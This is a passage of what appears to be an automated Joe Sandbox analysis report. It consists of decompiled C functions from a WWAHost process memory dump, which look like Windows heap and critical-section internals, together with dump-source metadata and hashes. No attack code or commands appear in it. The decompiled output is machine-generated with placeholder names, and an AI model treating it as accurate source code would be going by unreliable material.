                                              					_t20 = L03974620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                              				}
                                              				return _t20;
                                              			}







                                              C-Code - Quality: 100%
                                              			E0396FF60(intOrPtr _a4) {
                                              				void* __ecx;
                                              				void* __ebp;
                                              				void* _t13;
                                              				intOrPtr _t14;
                                              				void* _t15;
                                              				void* _t16;
                                              				void* _t17;
                                              
                                              				_t14 = _a4;
                                              				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x39311a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                              					return E03A288F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                              				} else {
                                              					return E03970050(_t14);
                                              				}
                                              			}











                                              C-Code - Quality: 100%
                                              			E03A0D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                              				void* _t5;
                                              
                                              				if(_a4 != 0) {
                                              					_t5 = L0395E8B0(__ecx, _a4, 0xfff);
                                              					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                              					return _t5;
                                              				}
                                              				return 0xc000000d;
                                              			}





                                              C-Code - Quality: 82%
                                              			E039E41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                              				void* _t5;
                                              				void* _t14;
                                              
                                              				_push(8);
                                              				_push(0x3a308f0);
                                              				_t5 = E039AD08C(__ebx, __edi, __esi);
                                              				if( *0x3a487ec == 0) {
                                              					E0396EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                              					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                              					if( *0x3a487ec == 0) {
                                              						 *0x3a487f0 = 0x3a487ec;
                                              						 *0x3a487ec = 0x3a487ec;
                                              						 *0x3a487e8 = 0x3a487e4;
                                              						 *0x3a487e4 = 0x3a487e4;
                                              					}
                                              					 *(_t14 - 4) = 0xfffffffe;
                                              					_t5 = L039E4248();
                                              				}
                                              				return E039AD0D1(_t5);
                                              			}






                                              C-Code - Quality: 100%
                                              			E0398A185() {
                                              				void* __ecx;
                                              				intOrPtr* _t5;
                                              
                                              				if( *0x3a467e4 >= 0xa) {
                                              					if(_t5 < 0x3a46800 || _t5 >= 0x3a46900) {
                                              						return L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                              					} else {
                                              						goto L1;
                                              					}
                                              				} else {
                                              					L1:
                                              					return E03970010(0x3a467e0, _t5);
                                              				}
                                              			}






                                              C-Code - Quality: 100%
                                              			E039816E0(void* __edx, void* __eflags) {
                                              				void* __ecx;
                                              				void* _t3;
                                              
                                              				_t3 = E03981710(0x3a467e0);
                                              				if(_t3 == 0) {
                                              					_t6 =  *[fs:0x30];
                                              					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                              						goto L1;
                                              					} else {
                                              						return L03974620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                              					}
                                              				} else {
                                              					L1:
                                              					return _t3;
                                              				}
                                              			}





                                              0x039816e8
                                              0x039816ef
                                              0x039816f3
                                              0x039816fe
                                              0x00000000
                                              0x03981700
                                              0x0398170d
                                              0x0398170d
                                              0x039816f2
                                              0x039816f2
                                              0x039816f2
                                              0x039816f2

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E039D53CA(void* __ebx) {
                                              				intOrPtr _t7;
                                              				void* _t13;
                                              				void* _t14;
                                              				intOrPtr _t15;
                                              				void* _t16;
                                              
                                              				_t13 = __ebx;
                                              				if( *((char*)(_t16 - 0x65)) != 0) {
                                              					E0396EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                              					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                              					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                              				}
                                              				if(_t15 != 0) {
                                              					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                              					return  *((intOrPtr*)(_t16 - 0x64));
                                              				}
                                              				return _t7;
                                              			}









                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0396AAB0() {
                                              				intOrPtr* _t4;
                                              
                                              				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                              				if(_t4 != 0) {
                                              					if( *_t4 == 0) {
                                              						goto L1;
                                              					} else {
                                              						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                              					}
                                              				} else {
                                              					L1:
                                              					return 0x7ffe0030;
                                              				}
                                              			}





                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E039835A1(void* __eax, void* __ebx, void* __ecx) {
                                              				void* _t6;
                                              				void* _t10;
                                              				void* _t11;
                                              
                                              				_t10 = __ecx;
                                              				_t6 = __eax;
                                              				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                              					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                              				}
                                              				if( *((char*)(_t11 - 0x1a)) != 0) {
                                              					return E0396EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                              				}
                                              				return _t6;
                                              			}







                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0395DB40() {
                                              				signed int* _t3;
                                              				void* _t5;
                                              
                                              				_t3 = L03974620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                              				if(_t3 == 0) {
                                              					return 0;
                                              				} else {
                                              					 *_t3 =  *_t3 | 0x00000400;
                                              					return _t3;
                                              				}
                                              			}






                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E039DA537(intOrPtr _a4, intOrPtr _a8) {
                                              
                                              				return L03978E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                              			}




                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E03973A1C(intOrPtr _a4) {
                                              				void* _t5;
                                              
                                              				return L03974620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                              			}





                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E039836CC(void* __ecx) {
                                              
                                              				if(__ecx > 0x7fffffff) {
                                              					return 0;
                                              				} else {
                                              					return L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                              				}
                                              			}




                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E039676E2(void* __ecx) {
                                              				void* _t5;
                                              
                                              				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                              					return L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                              				}
                                              				return _t5;
                                              			}





                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0395AD30(intOrPtr _a4) {
                                              
                                              				return L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                              			}




                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E03977D50() {
                                              				intOrPtr* _t3;
                                              
                                              				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                              				if(_t3 != 0) {
                                              					return  *_t3;
                                              				} else {
                                              					return _t3;
                                              				}
                                              			}





                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E03982ACB() {
                                              				void* _t5;
                                              
                                              				return E0396EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                              			}





                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 53%
                                              			E039EFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                              				void* _t7;
                                              				intOrPtr _t9;
                                              				intOrPtr _t10;
                                              				intOrPtr* _t12;
                                              				intOrPtr* _t13;
                                              				intOrPtr _t14;
                                              				intOrPtr* _t15;
                                              
                                              				_t13 = __edx;
                                              				_push(_a4);
                                              				_t14 =  *[fs:0x18];
                                              				_t15 = _t12;
                                              				_t7 = E0399CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                              				_push(_t13);
                                              				E039E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                              				_t9 =  *_t15;
                                              				if(_t9 == 0xffffffff) {
                                              					_t10 = 0;
                                              				} else {
                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                              				}
                                              				_push(_t10);
                                              				_push(_t15);
                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                              				return E039E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                              			}











                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039EFDFA
                                              Strings
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039EFE01
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039EFE2B
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 4ec4c24587ce698b841bd256a7e14dc1daeb2ed171c8783a1a2d9ff2967b1992
                                              • Instruction ID: 25f7bce81bb50ea4dc39abee73a47c188d271aba8b9874b8c7af97a5a889d37c
                                              • Opcode Fuzzy Hash: 4ec4c24587ce698b841bd256a7e14dc1daeb2ed171c8783a1a2d9ff2967b1992
                                              • Instruction Fuzzy Hash: C5F0F676200201BFEA219A89DC02F23BB5AEB85730F154319F6685A1D1DA63FC30D6F0
                                              Uniqueness

                                              Uniqueness Score: -1.00%